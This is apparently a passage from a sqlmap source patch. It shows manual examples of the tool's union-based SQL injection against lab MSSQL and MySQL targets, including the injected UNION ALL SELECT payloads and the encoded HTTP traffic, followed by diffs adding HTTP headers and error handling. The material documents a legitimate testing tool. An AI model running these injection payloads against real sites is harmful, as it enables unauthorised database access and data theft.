 exploitable, it will trigger this vulnerability to retrieve the output of
 the <tt>SELECT</tt> queries.
 <p>
 Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
 <tscreen><verb>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&amp;cat=2" -v 1 \
  --union-use --banner
 [...]
 back-end DBMS:	Microsoft SQL Server 2000
 [hh:mm:42] [INFO] fetching banner
 [hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
 [hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
 [hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
 [hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection 
 vulnerability
 [hh:mm:42] [INFO] query:  UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
 CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
 CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
 [hh:mm:42] [INFO] performed 3 queries in 0 seconds
 banner:
 ---
 Microsoft SQL Server  2000 - 8.00.194 (Intel X86) 
 	Aug  6 2000 00:57:48 
 	Copyright (c) 1988-2000 Microsoft Corporation
 	Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
 ---
 </verb></tscreen>
 <p>
 As you can see, the vulnerable parameter (<tt>id</tt>) is affected by both
 blind SQL injection and exploitable inband SQL injection vulnerabilities.
 <p>
 Example on a <bf>MySQL 5.0.51</bf> target:
 <tscreen><verb>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 5 \
  --union-use --banner
 [...]
 [hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection 
 vulnerability
 [hh:mm:25] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
 IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL-- 
 AND 6043=6043
 [hh:mm:25] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
 %2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
 %2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
 06043=6043&amp;cat=2 HTTP/1.1
 Host: 192.168.1.121:80
 User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
 Connection: close
 [hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
 Date: Mon, 28 Jul 2008 22:34:25 GMT
 Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8 
 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
 X-Powered-By: PHP/5.2.4-2ubuntu5.2
 Content-Length: 194
 Connection: close
 Content-Type: text/html
 &lt;html&gt;&lt;body&gt;
 &lt;b&gt;SQL results:&lt;/b&gt;
 &lt;table border="1"&gt;
 &lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;blLOjN5.0.51a-3ubuntu5.2zniYyA&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
 [hh:mm:25] [INFO] performed 3 queries in 0 seconds
 banner:    '5.0.51a-3ubuntu5.2'
 </verb></tscreen>
 <p>
 As you can see, the MySQL <tt>version()</tt> function (banner) output is
 nested (inband) within the HTTP response page, this makes the inband SQL
 injection exploitable.
 <sect2>Estimated time of arrival
 <p>
--- a/lib/core/option.py
+++ b/lib/core/option.py
@ -278,6 +278,13 @@ def __setHTTPMethod():
        conf.method = "GET"
 def __setHTTPStandardHeaders():
    conf.httpHeaders.append(("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"))
    conf.httpHeaders.append(("Accept-Language", "en-us,en;q=0.5"))
    conf.httpHeaders.append(("Accept-Encoding", "gzip,deflate"))
    conf.httpHeaders.append(("Accept-Charset", "ISO-8859-15,utf-8;q=0.7,*;q=0.7"))
 def __defaultHTTPUserAgent():
    """
    @return: default sqlmap HTTP User-Agent header
@ -566,6 +573,7 @@ def init(inputOptions=advancedDict()):
    __setHTTPCookies()
    __setHTTPReferer()
    __setHTTPUserAgent()
    __setHTTPStandardHeaders()
    __setHTTPMethod()
    __setHTTPAuthentication()
    __setHTTPProxy()
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@ -24,6 +24,7 @@ Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 import httplib
 import md5
 import re
 import socket
@ -182,6 +183,19 @@ class Connect:
                warnMsg += " or proxy"
                raise sqlmapConnectionException, warnMsg
        except httplib.BadStatusLine, _:
            warnMsg = "the target url responded with an unknown HTTP "
            warnMsg += "status code, try to force the HTTP User-Agent "
            warnMsg += "header with option --user-agent or -a"
            if conf.googleDork:
                warnMsg += ", skipping to next url"
                logger.warn(warnMsg)
                return None
            else:
                raise sqlmapConnectionException, warnMsg
        parsePage(page)
        responseMsg += "(%s - %d):\n" % (status, code)